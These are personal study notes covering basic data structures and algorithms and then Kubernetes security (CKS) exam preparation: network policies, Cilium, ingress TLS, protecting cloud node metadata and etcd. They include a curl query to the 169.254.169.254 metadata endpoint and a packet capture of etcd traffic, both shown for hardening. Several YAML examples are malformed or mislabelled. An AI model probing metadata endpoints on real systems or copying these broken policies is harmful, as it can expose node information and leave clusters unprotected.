  • A red-black tree is a self-balancing binary search tree where each node has an extra bit for denoting the color of the node, either red or black. By constraining the node colors on any path from the root to a leaf, red-black trees ensure that no such path is more than twice as long as any other, thus the tree remains approximately balanced.
  • red/black = true/false
  • Properties of red-black trees:
    • Each node is either red or black
    • The root is always black
    • All null leaf nodes are black
    • If a node is red, both its children must be black (no two reds in a row)
    • All paths from a single node go through the same number of black nodes
  • When a branch starts to get too long, the tree rotates and recolors nodes to maintain balance ….

Tries

  • A trie, is simply a nested tree of dictionaries, where each key is a character that maps to the next character in a string. The end of a string is often marked with a special terminating character, such as an asterisk (*).
  • Example:
    {
        "h": {
            "e": {
                "l": {
                    "l": {
                        "o": {
                            "*": True
                        }
                    },
                    "p": {
                        "*": True
                    }
                }
            },
            "i": {
                "*": True
            }
        }
    }
    
  • Tries are often used in autocomplete systems, spell checkers, and IP routing algorithms. ….

Graphs

  • A graph is a non-linear data structure made up of vertices (nodes) and edges that connect them.
  • A graph can be represented as a matrix
  • Example:
[
  [False, True, False, False, True],
  [True, False, True, True, True],
  [False, True, False, True, False],
  [False, True, True, False, True],
  [True, True, False, True, False]
]
  • An undirected graph can have up to n(n-1)/2 edges, where n is the number of vertices ….

Breadth-First Search (BFS)

  • BFS is an algorithm for traversing tree or graph data structures
  • It starts at the root (or an arbitrary node in the case of a graph) and explores all of the neighbor nodes at the present depth prior to moving on to the nodes at the next depth level.

Depth-First Search (DFS)

  • DFS is an algorithm for traversing tree or graph data structures
  • It starts at the root (or an arbitrary node in the case of a graph) and explores as far as possible along each branch before backtracking.

Euclid’s Algorithm

  • Euclid’s Algorithm is an efficient way to find the greatest common factor of a number. First, you divide the number x by y, to find the remainder. Then you divide again, using the remainder for y and the previous y as the new x. You continue this process until the remainder is 0. The last divisor is the greatest common factor.

For example:

20 / 12 = 8 12 / 8 = 4 8 / 4 = 2 // remainder 0 so the GCF is 4

The greatest common factor of 20 and 12 is 4

def greatestCommonFactor(x,y):
  if y == 0:
    x,y = y,x
  while y != 0:
    x,y = y,x % y
  return x

fizzbuzz

Examples

  • Python
def fizzbuzz(n):
    for i in range(1, n + 1):
        if i % 3 == 0 and i % 5 == 0:
            print('FizzBuzz')
        elif i % 3 == 0:
            print('Fizz')
        elif i % 5 == 0:
            print('Buzz')
        else:
            print(i)
  • Go
package main

import "fmt"

func main() {
    for i := 1; i <= 100; i++ {
        if i%3 == 0 {
            fmt.Printf("fizz")
        }
        if i%5 == 0 {
            fmt.Printf("buzz")
        }
        if i%3 != 0 && i%5 != 0 {
            fmt.Printf("%d", i)
        }
        fmt.Printf("\n")
    }
}
  • c#
for (int i = 1; i <= 100; i++)  
{  
    if (i % 3 == 0 && i % 5 == 0)  
    {  
        Console.WriteLine("FizzBuzz");  
    }  
    else if (i % 3 == 0)  
    {  
       Console.WriteLine("Fizz");  
    }  
    else if (i % 5 == 0)  
    {  
       Console.WriteLine("Buzz");  
    }  
    else  
    {  
        Console.WriteLine(i);  
    }  
}

Graph Theory

A good way to learn about graph theory is the Konigsberg bridge problem. The town of Konigsberg had a river flowing through it, the river divided the city into four regions, which were connected by seven bridges. The question arose of whether it might be possible to take a walk through the city, crossing every bridge only once.

Konigsberg

We can simplify the map by replacing each region with a vertex and each bridge with an edge between two vertexes:

VertexMap

The key logical insight is to enter and leave a landmass requires two separate bridges, so any landmass which is not the starting or ending position must be the endpoint of an even number of bridges. In the case of Konigsberg, all four regions contained an odd number of bridges, making the problem unsolvable. A path through a graph which visits every edge exactly once is now called an Eulerian path.

Converting the map to a graph allows us to avoid Parkinson’s Law of Triviality.

A graph is a way of representing relationships in a set of data. When discussing the size of a graph, we often use ‘n’ for the number of vertices (nodes) and ‘m’ for the number of edges. The amount of space the graph requires depends on how we store the data. Two common methods are adjacency lists and adjacency matrices.

  • adjacency Lists: When using an adjacency list, each node of the graph is stored with a list of nodes to which it is adjacent.
  • adjacency matrix:

Hashing

Why we need hashing

To achieve horizontal scaling, it is important to distribute requests/data efficiently across servers.

Traditional (modulus) Hashing

If you have n cache servers, a common way to balance the load is to use the following hash method:

serverIndex = hash(key) % n --where n is the number of servers in the pool

Suppose we have 4 servers in the pool and 8 string keys with their hashes:

keyhashhash % 4
key0183586171
key1261435840
key2181311462
key3358634960
key4340858091
key5275817033
key6381649782
key7225303513

To fetch the server where the key is stored, we perform the modular operation f(key) % 4. So hash(key0) % 4 means the client must contact server 1 fetch the cached data.

This approach works well when the size of the server pool doesn’t change. However, if new servers are added or existing servers removed, the hashing algorith changes. For example, if we removed a server, the hash algorith is now hash(key) % 3. If an existing client already had data in the cache, and they used this updated hash algorithm, they will receive a different server index that doesn’t contain their cached data. This results in cache misses. When one server goes offline or is removed, most cache clients will connect to the wrong servers to fetch data. Consistent Hashing is a method to fix this problem.

Consistent Hashing

Consistent hashing is a technique used in distributed systems to divide data among multiple caching servers or nodes. It aims to evenly distribute the data and minimize the amount of data that needs to be moved when nodes are added or removed from the system.

With consistent hashing, the hash space is represented as a ring, also known as a hash ring. Each server is assigned a position on the ring based on its hash value. The data is also hashed, and its hash value is mapped onto the ring. To determine which server should store the data, the position of the data’s hash value is found on the ring, and the next server in a clockwise direction on the ring becomes the data’s assigned server.

This approach provides several advantages:

  1. Load balancing: Since the servers are evenly distributed on the ring, the data is also distributed evenly, minimizing hotspots and ensuring a balanced load across the nodes.
  2. Scalability: When a new server is added, only a portion of the data needs to be remapped to the new server, reducing the overall amount of data movement. Similarly, when a server is removed, only the data assigned to that server needs to be redistributed.
  3. Fault tolerance: In the event of a server failure, only the data assigned to that server needs to be remapped, minimizing the impact on the overall system.
  4. Consistency: The term “consistent” in consistent hashing refers to the stability of the mapping between data and servers. In traditional hashing, small changes in the number of servers can drastically change the assignment of data, but consistent hashing minimizes such changes.

Overall, consistent hashing allows for efficient and dynamic data distribution in distributed systems, enabling scalability, fault tolerance, and load balancing.

string algorithms

Anagram Detection

  • Two strings are anagrams if they contain the same letters, but not necessarily in the same order.
  • ‘car’ and ‘arc’ are anagrams
  • The key to determining if 2 strings are anagrams is to sort them. If the sorted strings are the same, they are anagrams.
  • Rules for creating an algorithm to determine if 2 strings are an anagram
    • remove spaces in the words
    • convert all letters to lowercase
    • trim spaces if necessary
    • sort the strings
    • compare the strings to see if they are the same

Palindrome Detection

  • A palindrome is a word that reads the same backword as forward
  • Hannah, mom, wow, and racecar are all examples of palindromes
  • A simple way to see if a string is a palindrome is to copy it and compare the copy to the original. If they are equal, the string is a palindrome.

DevOps

Directory Map

DevOps Principles

  1. Customer-centric action - All activity around building software must frequently involve the clients
  2. Create with the end in mind - Focus on building a whole product that is being presented to real customers
  3. End-to-end responsibility - All members of a devops team are responsible for the software they deliver
  4. Cross-functional autonomous teams - Organizations that work with vertical and fully responsible teams will need to let those teams work completely independently throughout the whole life cycle. To do this, each team member must have a broad range of skills, ranging from administration to development.
  5. Continuous Improvement - Adapt to changes continuously
  6. Automate everything - focus on automation in everything that you do

The four stages of the SDLC:

  • Plan
  • Develop
  • Deliver
  • Operate

Kubernetes

Directory Map

CKS

Directory Map

Certified Kubernetes Security Specialist (CKS) Notes

portfolio_view

portfolio_view

https://www.cncf.io/certification/cks/

Certified Kubernetes Security Specialist (CKS) Notes

Table of Contents

Exam

Outline

  • https://github.com/cncf/curriculum/blob/master/CKS_Curriculum%20v1.31.pdf

Cirriculum

Exam objectives that outline the knowledge, skills, and abilities that a Certified Kubernetes Security Specialist (CKS) can be expected to demonstrate.

Cluster Setup (10%)

Cluster Hardening (15%)

System Hardening (15%)

Minimize Microservice Vulnerabilities (20%)

Supply Chain Security (20%)

  • Minimize base image footprint

    • Remove exploitable and non-sssential software
    • Use multi-stage Dockerfiles to keep software compilation out of runtime images
    • Never bake any secrets into your images
    • Image scanning
  • Secure your supply chain: whitelist allowed image registries, sign and validate images

  • Use static analysis of user workloads (e.g. kubernetes resources, docker files)

    • Secure base images
    • Remove unnecessary packages
    • Stop containers from using elevated privileges
  • Scan images for known vulnerabilities

Monitoring, Logging and Runtime Security (20%)

Changes

  • https://kodekloud.com/blog/cks-exam-updates-2024-your-complete-guide-to-certification-with-kodekloud/
  • https://training.linuxfoundation.org/cks-program-changes/

Software / Environment

As of 11/2024

  • Kubernetes version: 1.31
  • Ubuntu 20.04
  • Terminal
    • Bash
  • Tools available
    • vim - Text/Code editor
    • tmux - Terminal multiplexor
    • jq - Working with JSON format
    • yq - Working with YAML format
    • firefox - Web Browser for accessing K8s docs
    • base64 - Tool to convert to and from base 64
    • kubectl - Kubernetes CLI Client
    • more typical linux tools like grep, wc
  • 3rd Party Tools to know
    • tracee
    • OPA Gatekeeper
    • kubebench
    • syft
    • grype
    • kube-linter
    • kubesec
    • trivy
    • falco

Exam Environment Setup

Terminal Shortcuts/Aliases

The following are useful terminal shortcut aliases/shortcuts to use during the exam.

Add the following to the end of ~/.bashrc file:

alias k='kubectl # <-- Most general and useful shortcut!

alias kd='kubectl delete --force --grace-period=0 # <-- Fast deletion of resources

alias kc="kubectl create" # <-- Create a resource
alias kc-dry='kubectl create --dry-run=client -o yaml # <-- Create a YAML template of resource

alias kr='kubectl run' # <-- Run/Create a resource (typically pod)
alias kr-dry='kubectl run --dry-run=client -o yaml # <-- Create a YAML template of resource

# If kc-dry and kr-dry do not autocomplete, add the following

export do="dry-run=client -o yaml" # <-- Create the YAML tamplate (usage: $do)

The following are some example usages:

k get nodes -o wide
kc deploymentmy my-dep --image=nginx --replicas=3
kr-dry my-pod --image=nginx --command sleep 36000
kr-dry --image=busybox -- "/bin/sh" "-c" "sleep 36000"
kr --image=busybox -- "/bin/sh" "-c" "sleep 36000" $do

Terminal Command Completion

The following is useful so that you can use the TAB key to auto-complete a command, allowing you to not always have to remember the exact keyword or spelling.

Type the following into the terminal:

- kubectl completion bash >> ~/.bashrc`-`kubectl` command completion
- kubeadm completion bash >> ~/.bashrc`-`kubeadm` command completion
- exec $SHELL` - Reload shell to enable all added completion

VIM

The exam will have VIM or nano terminal text editor tools available. If you are using VIM ensure that you create a ~/.vimrc file and add the following:

set ts=2 " <-- tabstop - how many spaces is \t worth
set sw=2 " <-- shiftwidth - how many spaces is indentation
set et " <-- expandtab - Use spaces, never \t values
set mouse=a " <-- Enable mouse support

Or simply:

set ts=2 sw=2 et mouse=a

Also know VIM basics are as follows. Maybe a good idea to take a quick VIM course.

  • vim my-file.yaml - If file exists, open it, else create it for editing
  • :w - Save
  • :x - Save and exit
  • :q - Exit
  • :q! - Exit without saving
  • i - Insert mode, regular text editor mode
  • v - Visual mode for selection
  • ESC - Normal mode

Pasting Text Into VIM

Often times you will want to paste text or code from the Kubernetes documentation into into a VIM terminal. If you simply do that, the tabs will do funky things.

Do the following inside VIM before pasting your copied text:

  1. In NORMAL mode, type :set paste
  2. Now enter INSERT mode
  • You should see – INSERT (paste) -- at the bottom of the screen
  1. Paste the text
  • You can right click with mouse and select Paste or CTRL + SHIFT + v

tmux

tmux will allow you to use multiple terminal windows in one (aka terminal multiplexing). Make sure you know the basics for tmux usage:

  • tmux- Turn and entertmux
  • CTRL + b " - Split the window vertically (line is horizontal)
  • CTRL + b % - Split the window horizontally (line is vertical)
  • CTRL + b <ARROW KEY> - Switch between window panes
  • CTRL + b (hold) <ARROW KEY> - Resize current window pane
  • CTRL + b z - Toggle full terminal/screen a pane (good for looking at a full document)
  • CTRL + dorexit - Close a window pane

Mouse Support

If you want to be able to click and select within tmux and tmux panes, you can also enable mouse support. This can be useful.

These steps must be done outside of tmux`

  1. Create a .tmux.conf file and edit it

    • vim ~/.tmux.conf
  2. Add the configuration, save, and exit file

    • set -g mouse on
  3. Reload tmux configuration

    • tmux source .tmux.conf

Preparation

Study Resources

Practice

Fundamentals

  • You should already have CKA level knowledge
  • Linux Kernel Namespaces isolate containers
    • PID Namespace: Isolates processes
    • Mount Namespace: Restricts access to mounts or root filesystem
    • Network Namespace: Only access certain network devices. Firewall and routing rules
    • User Namespace: Different set of UIDs are used. Example: User (UID 0) inside one namespace can be different from user(UID 0) inside another namespace
  • cgroups restrict resource usage of processes
    • RAM/Disk/CPU
  • Using cgroups and linux kernel namespaces, we can create containers

Understand the Kubernetes Attack Surface

  • Kubernetes is a complex system with many components. Each component has its own vulnerabilities and attack vectors.
  • The attack surface can be reduced by:
    • Using network policies to restrict traffic between pods
    • Using RBAC to restrict access to the kube-api server
    • Using admission controllers to enforce security policies
    • Using pod security standards to enforce security policies
    • Using best practices to secure the underlying infrastructure
    • Using securityContext to enforce security policies for pods

The 4 C’s of Cloud-Native Security

  • Cloud: Security of the cloud infrastructure
  • Cluster: Security of the cluster itself
  • Container: Security of the containers themselves
  • Code: Security of the code itself

1 Cluster Setup

CIS Benchmark

What is a security benchmark?

  • A security benchmark is a set of standard benchmarks that define a state of optimized security for a given system (servers, network devices, etc.)
  • CIS (Center for Internet Security) provides standardized benchmarks (in the form of downloadable files) that one can use to implement security on their system.
  • CIS provides benchmarks for public clouds (Azure, AWS, GCP, etc.), operating systems (Linux, Windows, MacOS), network devices (Cisco, Juniper, HP, etc.), mobile devices (Android and Apple), desktop and server software (such as Kubernetes)
  • View more info here
  • You must register at the CIS website to download benchmarks
  • Each benchmark provides a description of a vulnerability, as well as a path to resolution.
  • CIS-CAT is a tool you can run on a system to generate recommendations for a given system. There are two versions available for download, CIS-CAT Lite and CIS-CAT Pro. The Lite version only includes benchmarks for Windows 10, MacOS, Ubuntu, and desktop software (Google Chrome, etc.). The Pro version includes all benchmarks.
  • CIS Benchmarks for Kubernetes
    • Register at the CIS website and download the CIS Benchmarks for kubernetes
    • Includes security benchmarks for master and worker nodes

KubeBench

  • KubeBench is an alternative to CIS-CAT Pro to run benchmarks against a Kubernetes cluster.
  • KubeBench is open source and maintained by Aqua Security
  • KubeBench can be deployed as a Docker container or a pod. It can also be invoked directly from the binaries or compiled from source.
  • Once run, kube-bench will scan the cluster to identify if best-practices have been implemented. If will output a report specifying which benchmarks have passed/failed. It will tell you how to fix any failed benchmarks.
  • You can view the report by tailing the pod logs of the kube-bench pod.

Cluster Upgrades

  • The controller-manager and kube-scheduler can be one minor revision behind the API server.
    • For example, if the API server is at version 1.10, controller-manager and kube-scheduler can be at 1.9 or 1.10
  • The kubelet and kube-proxy can be up to 2 minor revisions behind the API server
  • kubectl can be x+1 or x-1 minor revisions from the kube API server
  • You can upgrade the cluster one minor version at a time

Upgrade Process

  • Drain and cordon the node before upgrading it
    • kubectl drain <node name> --ignore-daemonsets
  • Upgrade the master node first.
  • Upgrade worker nodes after the master node.

Upgrading with Kubeadm

  • If the cluster was created with kubeadm, you can use kubeadm to upgrade it.
  • The upgrade process with kubeadm:
    # Increase the minor version in the apt repository file for kubernetes:
      sudo vi /etc/apt/sources.list.d/kubernetes.list
    
    # Determine which version to upgrade to
      sudo apt update
      sudo apt-cache madison kubeadm
    
    # Upgrade kubeadm first
      sudo apt-mark unhold kubeadm && \
      sudo apt-get update && sudo apt-get install -y kubeadm='1.31.x-*' && \
      sudo apt-mark hold kubeadm
    
    # Verify the version of kubeadm
      kubeadm version
    
    # Check the kubeadm upgrade plan
      sudo kubeadm upgrade plan
    
    # Apply the upgrade plan
      sudo kubeadm upgrade apply v1.31.x
    
    # Upgrade the nodes
      sudo kubeadm upgrade node
    
    # Upgrade kubelet and kubectl
      sudo apt-mark unhold kubelet kubectl && \
      sudo apt-get update && sudo apt-get install -y kubelet='1.31.x-*' kubectl='1.31.x-*' && \
      sudo apt-mark hold kubelet kubectl
    
    # Restart the kubelet
      sudo systemctl daemon-reload
      sudo systemctl restart kubelet
    

Network Policies

Overview

  • Kubernetes Network Policies allow you to control the flow of traffic to and from pods. They define rules that specify:

    • What traffic is allowed to reach a set of pods.
    • What traffic a set of pods can send out.
  • Pods can communicate with each other by default. Network Policies allow you to restrict this communication.

  • Network Policies operate at Layer 3 and Layer 4 (IP and TCP/UDP). They do not cover Layer 7 (application layer).

  • Network Policies are additive. Meaning, to grant more permissions for network communication, simply create another network policy with more fine-grained rules.

  • Network Policies are implemented by the network plugin. The network plugin must support NetworkPolicy for the policies to take effect.

  • Network Policies are namespace-scoped. They apply to pods in the same namespace.

    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata: 
      name: default-deny-all
      namespace: secure-namespace
    spec:
        podSelector: {}
        policyTypes
        - Ingress
    
  • Say we now want to grant the ‘frontend’ pods with label ‘teir: frontend’ in the ‘app’ namespace access to the ‘backend’ pods in ‘secure-namespace’. We can do that by creating another Network Policy like this:

    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: allow-app-pods
      namespace: secure-namespace
    spec:
        podSelector:
          matchLabels:
            tier: backend
        policyTypes:
        - Ingress
        ingress:
        - from:
          - namespaceSelector:
              matchLabels:
                name: app
            podSelector:
              matchLabels:
                teir: frontend
          ports:
          - protocol: TCP
            port: 3000
    
    

Key Concepts

  1. Namespace Scope: Network policies are applied at the namespace level.
  2. Selector-Based Rules:
    • Pod Selector: Select pods the policy applies to.
    • Namespace Selector: Select pods based on their namespace.
  3. Traffic Direction:
    • Ingress: Traffic coming into the pod.
    • Egress: Traffic leaving the pod.
  4. Default Behavior:
    • Pods are non-isolated by default (accept all traffic).
    • A pod becomes isolated when a network policy matches it.

Common Fields in a Network Policy

  • podSelector: Specifies the pods the policy applies to.
  • ingress/egress: Lists rules for ingress or egress traffic.
  • from/to: Specifies allowed sources/destinations (can use IP blocks, pod selectors, or namespace selectors).
  • ports: Specifies allowed ports and protocols.

Example Network Policies

Allow All Ingress Traffic

````
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-all-ingress
  namespace: default
spec:
  podSelector: {}
  ingress:
  - {}
```

Deny All Ingress and Egress Traffic

````
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
    name: deny-all
    namespace: defaulT
spec:
    podSelector: {}
    ingress: []
    egress: []

```

Allow Specific Ingress from a Namespace

```
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
    name: allow-namespace-ingress
    namespace: default
spec:
    podSelector:
        matchLabels:
            app: my-app
    ingress:
    - from:
      - namespaceSelector:
        matchLabels:
        team: frontend
```

Allow Egress to a Specific IP

```
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
    name: allow-egress-specific-ip
    namespace: default
spec:
    podSelector:
        matchLabels:
            app: my-app
    egress:
    - to:
      - ipBlock:
        cidr: 192.168.1.0/24
        ports:
      - protocol: TCP
        port: 8080
```

Cilium Network Policy

  • Cilium Network Policies provide more granularity, flexibility, and features than traditional Kubernetes Network Policies
  • Cilium Network Policies operate up to layer 7 of the OSI model. Traditional Network Policies only operate up to layer 4.
  • Cilium Network Policies perform well due to the fact that they use eBPF
  • Hubble allows you to watch traffic going to and from pods
  • You can add Cilium to the cluster by:
    • Deploying with helm
    • Running cilium install after you install the cilium CLI tool

Cilium Network Policy Structure

  • Cilium Network Policies are defined in YAML files
  • The structure is similar to Kubernetes Network Policies

Layer 3 Rules

  • Endpoints Based - Apply the policy to pods based on Kubernetes label selectors
  • Services Based - Apply the policy based on kubernetes services, controlling traffic based on service names rather than individual pods
  • Entities Based - Cilium has pre-defined entities like cluster, host, and world. This type of policy uses these entities to determine what traffic the policy is applied to.
    • Cluster - Represents all kubernetes endpoints
      • Example:
        apiVersion: cilium.io/v2
        kind: CiliumNetworkPolicy
        metadata:
          name: allow-egress-to-cluster-resources
        spec:
          endpointSelector: {}
          egress:
          - toEntities:
            - cluster
        
    • World - Represents any external traffic, but not cluster traffic
      apiVersion: cilium.io/v2
      kind: CiliumNetworkPolicy
      metadata:
        name: allow-egress-to-external-resources
      spec:
        endpointSelector: {}
        egress:
        - toEntities:
          - world
      
    • Host - Represents the local kubernetes node
    • Remote-node - Represents traffic from a remote node
    • All - Represents all endpoints both internal and external to the cluster
      apiVersion: cilium.io/v2
      kind: CiliumNetworkPolicy
      metadata:
        name: allow-egress-to-external-resources
      spec:
        endpointSelector: {}
        egress:
        - toEntities:
          - all
      
  • Node Based - Apply the policy based on nodes in the cluster
  • IP/CIDR Based - Apply the policy based on IP addresses or CIDR blocks

Layer 4 Rules

  • If no layer 4 rules are defined, all traffic is allowed for layer 4
  • Example:
      apiVersion: "cilium.io/v2"
      kind: CiliumNetworkPolicy
      metadata:
        name: allow-external-80
      spec:
        endpointSelector:
          matchLabels:
            run: curl
        egress:
          - toPorts:
            - ports:
              - port: "80"
                protocol: TCP
    

Layer 7 Rules

Deny Policies

  • You can create deny policies to explicitly block traffic
  • Deny policies take higher precedence over allow policies
  • ingressDeny Example:
    apiVersion: "cilium.io/v2"
    kind: CiliumNetworkPolicy
    metadata:
      name: deny-ingress-80-for-backend
    spec:
      endpointSelector:
        matchLabels:
          app: backend
      ingressDeny:
      - fromEntities:
        - all
      - toPorts:
        - ports:
          - port: "80"
            protocol: TCP
    
  • egressDeny Example:
    apiVersion: "cilium.io/v2"
    kind: CiliumNetworkPolicy
    metadata:
      name: "deny-egress"
    spec:
      endpointSelector:
        matchLabels:
          app: random-pod
      egress:
      - toEntities:
        - all
      egressDeny:
      - toEndpoints:
        - matchLabels:
            app: server
    

Examples

Default Deny All

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: default-deny-all
spec:
  endpointSelector: {}
  ingress:
  - fromEntities:
    - world

Kubernetes Ingress

What is Ingress?

  • Ingress is an API object that manages external access to services in a Kubernetes cluster, typically HTTP and HTTPS.
  • Provides:
    • Load balancing
    • SSL termination
    • Name-based virtual hosting

Why Use Ingress?

  • To consolidate multiple service endpoints behind a single, externally accessible URL.
  • Reduce the need for creating individual LoadBalancers or NodePort services.

Key Components of Ingress

  1. Ingress Controller

    • Software that watches for Ingress resources and implements the rules.
    • Popular Ingress controllers:
      • ingress-nginx
      • Traefik
      • HAProxy
      • Istio Gateway
    • Must be installed separately in the cluster.
  2. Ingress Resource

    • The Kubernetes object that defines how requests should be routed to services.

Ingress Resource Configuration

  • As of Kubernetes 1.20, you can create an ingress using kubectl:
    kubectl create ingress  --rule="host/path=service:port"
    

Basic Structure

```
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: example-ingress
spec:
  rules:
    - host: example.com
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: example-service
                port:
                  number: 80
```

Ingress with TLS

  • Kubernetes automatically creates a self-signed certificate for HTTPS. To view it, first determine the HTTPS port of the ingress controller service:

    kubeadmin@kube-controlplane:~$ k get svc -n ingress-nginx
    NAME                                 TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)                      AGE
    ingress-nginx-controller             NodePort    10.103.169.156   <none>        80:31818/TCP,443:30506/TCP   38m
    ingress-nginx-controller-admission   ClusterIP   10.103.26.228    <none>        443/TCP                      38m
    kubeadmin@kube-controlplane:~$
    
  • The HTTPS port is 30506 in this case. To view the self-signed certificate, we can use curl:

     λ notes $ curl https://13.68.211.113:30506/service1 -k -v
    * (304) (OUT), TLS handshake, Finished (20):
    } [52 bytes data]
    * SSL connection using TLSv1.3 / AEAD-AES256-GCM-SHA384 / [blank] / UNDEF
    * ALPN: server accepted h2
    * Server certificate:
    *  subject: O=Acme Co; CN=Kubernetes Ingress Controller Fake Certificate             <<<<<<<<<<<<<<<<
    *  start date: Dec 20 14:23:08 2024 GMT
    *  expire date: Dec 20 14:23:08 2025 GMT
    *  issuer: O=Acme Co; CN=Kubernetes Ingress Controller Fake Certificate
    *  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
    * using HTTP/2
    * [HTTP/2] [1] OPENED stream for https://13.68.211.113:30506/service1
    * [HTTP/2] [1] [:method: GET]
    * [HTTP/2] [1] [:scheme: https]
    * [HTTP/2] [1] [:authority: 13.68.211.113:30506]
    * [HTTP/2] [1] [:path: /service1]
    * [HTTP/2] [1] [user-agent: Mozilla/5.0 Gecko]
    * [HTTP/2] [1] [accept: */*]
    > GET /service1 HTTP/2
    > Host: 13.68.211.113:30506
    > User-Agent: Mozilla/5.0 Gecko
    > Accept: */*
    
  • To configure a ingress resource to use TLS (HTTPS), we first need to create a certificate:

    # create a new 2048-bit RSA private key and associated cert
    openssl req -nodes -new -x509 -keyout my.key -out my.crt -subj "/CN=mysite.com"
    
  • Next, create a secret for the tls cert:

    kubectl create secret tls mycert --cert=my.crt --key=my.key -n my-namespace
    
  • Create the ingress:

    apiVersion: networking.k8s.io/v1
    kind: Ingress
    metadata:
      name: secure-ingress
      annotations:
        nginx.ingress.kubernetes.io/ssl-redirect: "true"
    spec:
      tls:
        - hosts:
            - example.com
          secretName: mycert
      rules:
        - host: example.com
          http:
            paths:
              - path: /
                pathType: Prefix
                backend:
                  service:
                    name: secure-service
                    port:
                      number: 80
    

Annotations

  • Extend the functionality of Ingress controllers.
  • Common examples (specific to nginx):
    • nginx.ingress.kubernetes.io/rewrite-target: Rewrite request paths.
    • nginx.ingress.kubernetes.io/ssl-redirect: Force SSL.
    • nginx.ingress.kubernetes.io/proxy-body-size: Limit request size.

Protecting Node Metadata and Endpoints

Protecting Endpoints

- Kubernetes clusters expose information on various ports:

    | Port Range | Purpose  |
    | ---------- | -------  | 
    | 6443       | kube-api |
    | 2379 - 2380 | etcd    |
    | 10250       | kubelet api |
    | 10259       | kube-scheduler |
    | 10257       | kube-controller-manager |

- Many of these ports are configurable. For example, to change the port that kube-api listens on, just modify `--secure-port` in the kube-api manifest.
- Setup firewall rules to minimize the attack surface

Securing Node Metadata

  • A lot of information can be obtained from node metadata

    • Node name
    • Node state
    • annotations
    • System Info
    • etc.
  • Why secure node metadata?

    • If node metadata is tampered with, pods may be assigned to the wrong nodes, which has security implications to considers
    • You can determine the version of kubelet and other kubernetes components from node metadata
    • If an attacker can modify node metadata, they could taint all the nodes, making all nodes unscheduleable
  • Protection Strategies

    • Use RBAC to control who has access to modify node metadata
    • Node isolation using labels and node selectors
    • Audit logs to determine who is accessing the cluster and respond accordingly
    • Update node operating systems regularly
    • Update cluster components regularly
  • Cloud providers such as Amazon and Azure often expose node information via metadata endpoints on the node. These endpoints are important to protect.

  • This endpoint can be accessed at 169.254.169.254 on nodes in both Azure and AWS. An example for Azure:

    curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq
    
  • Node metadata endpoints can be prevented from being accessed by pods by creating network policies.

    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: default-deny-ingress-metadata-server
      namespace: a12
    spec:
      policyTypes:
      - Egress
      podSelector: {}
      egress:
      - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
            - 169.254.169.254/32
    

Verify Kubernetes Binaries

  • The SHA sum of a file changes if the content within the file is changed
  • You can download the binaries from github using wget. Example: wget -O /opt/kubernetes.tar.gz https://dl.k8s.io/v1.31.1/kubernetes.tar.gz
  • To validate that a binary downloaded from the internet has not been modified, check the hash code:
    echo $(cat kubectl.sha256) kubectl | sha256sum --check
    

Securing etcd

  • etcd is a distributed key-value store that Kubernetes uses to store configuration data
  • etcd by default listens on port 2379/tcp

Play with etcd

Step 1: Create the Base Binaries Directory

```sh
    mkdir /root/binaries
    cd /root/binaries
```

Step 2: Download and Copy the ETCD Binaries to Path

```sh
    wget https://github.com/etcd-io/etcd/releases/download/v3.5.18/etcd-v3.5.18-linux-amd64.tar.gz

    tar -xzvf etcd-v3.5.18-linux-amd64.tar.gz

    cd /root/binaries/etcd-v3.5.18-linux-amd64/

    cp etcd etcdctl /usr/local/bin/
```

Step 3: Start etcd

```sh
    cd /tmp
    etcd
```

Step 4: Verification - Store and Fetch Data from etcd

```sh
    etcdctl put key1 "value1"
```

```sh
    etcdctl get key1
```

Encrypting data in transit in etcd

  • etcd supports TLS encryption for data in transit
  • By default, etcd packaged with kubeadm is configured to use TLS encryption
  • One can capture packets from etcd using tcpdump:
          root@controlplane00:/var/lib/etcd/member# tcpdump -i lo -X port 2379
    
          tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
          listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
          16:10:01.691453 IP localhost.2379 > localhost.42040: Flags [P.], seq 235868994:235869033, ack 3277609642, win 640, options [nop,nop,TS val 1280288044 ecr 1280288042], length 39
                  0x0000:  4500 005b 35e4 4000 4006 06b7 7f00 0001  E..[5.@.@.......
                  0x0010:  7f00 0001 094b a438 0e0f 1342 c35c 5aaa  .....K.8...B.\Z.
                  0x0020:  8018 0280 fe4f 0000 0101 080a 4c4f a52c  .....O......LO.,
                  0x0030:  4c4f a52a 1703 0300 2289 00d8 5dcc 7b88  LO.*...."...].{.
                  0x0040:  6f7a 290f 536b 0fd0 f7d9 1fb4 f83f 4aab  oz).Sk.......?J.
                  0x0050:  a6e7 0af8 0835 e597 a93d 4d              .....5...=M
          16:10:01.691479 IP localhost.42040 > localhost.2379: Flags [.], ack 39, win 14819, options [nop,nop,TS val 1280288044 ecr 1280288044], length 0
                  0x0000:  4500 0034 7174 4000 4006 cb4d 7f00 0001  E..4qt@.@..M....
                  0x0010:  7f00 0001 a438 094b c35c 5aaa 0e0f 1369  .....8.K.\Z....i
                  0x0020:  8010 39e3 fe28 0000 0101 080a 4c4f a52c  ..9..(......LO.,
                  0x0030:  4c4f a52c                                LO.,
          16:10:01.691611 IP localhost.2379 > localhost.42040: Flags [P.], seq 39:1222, ack 1, win 640, options [nop,nop,TS val 1280288044 ecr 1280288044], length 1183
                  0x0000:  4500 04d3 35e5 4000 4006 023e 7f00 0001  E...5.@.@..>....
                  0x0010:  7f00 0001 094b a438 0e0f 1369 c35c 5aaa  .....K.8...i.\Z.
                  0x0020:  8018 0280 02c8 0000 0101 080a 4c4f a52c  ............LO.,
                  0x0030:  4c4f a52c 1703 0304 9ac0 c579 d4ed 808c  LO.,.......y....
    
